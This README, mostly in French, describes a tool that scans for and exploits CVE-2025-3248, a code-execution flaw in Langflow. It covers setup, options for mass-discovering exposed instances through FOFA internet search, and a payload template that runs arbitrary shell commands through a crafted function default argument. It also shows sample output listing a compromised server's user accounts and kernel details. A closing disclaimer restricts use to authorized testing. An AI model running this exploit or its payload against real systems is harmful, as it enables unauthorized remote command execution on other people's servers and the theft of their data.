
Un scanner de vulnérabilités pour CVE-2025-3248 dans les applications Langflow. Un outil pour scanner la vulnérabilité CVE-2025-3248 dans les applications Langflow.
中文 | English
Un scanner de vulnérabilités pour CVE-2025-3248 dans les applications Langflow.
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
# After you finish editing
mv .env.example .env
python main.py -t https://target.com
python main.py --fofa-email [email protected] --fofa-key your_api_key
-t, --target : URL cible à analyser--fofa-email : E-mail de l'API FOFA--fofa-key : Clé de l'API FOFA--fofa-query : Requête de recherche FOFA (défaut : 'app="LOGSPACE-LangFlow"')--country : Filtrer les résultats par code pays (p. ex. CN, US)--max-pages : Nombre maximal de pages FOFA à récupérer (défaut : 5)--page-size : Résultats par page (défaut : 100)--timeout : Délai d'expiration des requêtes en secondes (défaut : 10)--no-verify : Désactiver la vérification SSL--threads : Nombre de threads pour l'analyse concurrente (défaut : 5)-f, --file : Fichier Python personnalisé à utiliser comme payloadVous pouvez créer des payloads personnalisés en créant un fichier Python :
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
pass
Utilisez-le ensuite avec :
python main.py -t https://target.com -f your_payload.py
[+] User Accounts:
root UID:0 GID:0 Home:/root Shell:/bin/bash
daemon UID:1 GID:1 Home:/usr/sbin Shell:/usr/sbin/nologin
bin UID:2 GID:2 Home:/bin Shell:/usr/sbin/nologin
sys UID:3 GID:3 Home:/dev Shell:/usr/sbin/nologin
sync UID:4 GID:65534 Home:/bin Shell:/bin/sync
games UID:5 GID:60 Home:/usr/games Shell:/usr/sbin/nologin
man UID:6 GID:12 Home:/var/cache/man Shell:/usr/sbin/nologin
lp UID:7 GID:7 Home:/var/spool/lpd Shell:/usr/sbin/nologin
mail UID:8 GID:8 Home:/var/mail Shell:/usr/sbin/nologin
news UID:9 GID:9 Home:/var/spool/news Shell:/usr/sbin/nologin
uucp UID:10 GID:10 Home:/var/spool/uucp Shell:/usr/sbin/nologin
proxy UID:13 GID:13 Home:/bin Shell:/usr/sbin/nologin
www-data UID:33 GID:33 Home:/var/www Shell:/usr/sbin/nologin
backup UID:34 GID:34 Home:/var/backups Shell:/usr/sbin/nologin
list UID:38 GID:38 Home:/var/list Shell:/usr/sbin/nologin
irc UID:39 GID:39 Home:/run/ircd Shell:/usr/sbin/nologin
_apt UID:42 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
nobody UID:65534 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
user UID:1000 GID:0 Home:/app/data Shell:/bin/sh
[+] System Details:
Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux
⚠️ Avertissement Cet outil est réservé à des fins légales. Il est conçu à des fins éducatives, pour les tests de sécurité internes des entreprises ou pour une utilisation dans des environnements autorisés. Il est strictement interdit d'utiliser cet outil sur tout système, réseau ou appareil non autorisé, sous peine de violer les lois et réglementations en vigueur.
Les utilisateurs assument l'entière responsabilité légale de leurs actions. L'auteur et les contributeurs ne sont pas responsables des pertes, fuites de données ou conséquences juridiques causées par une mauvaise utilisation de cet outil.
⚠️ Ne pas utiliser pour des attaques illégales. Ne pas tenter de déployer ou d'exécuter cet outil sur des systèmes non autorisés.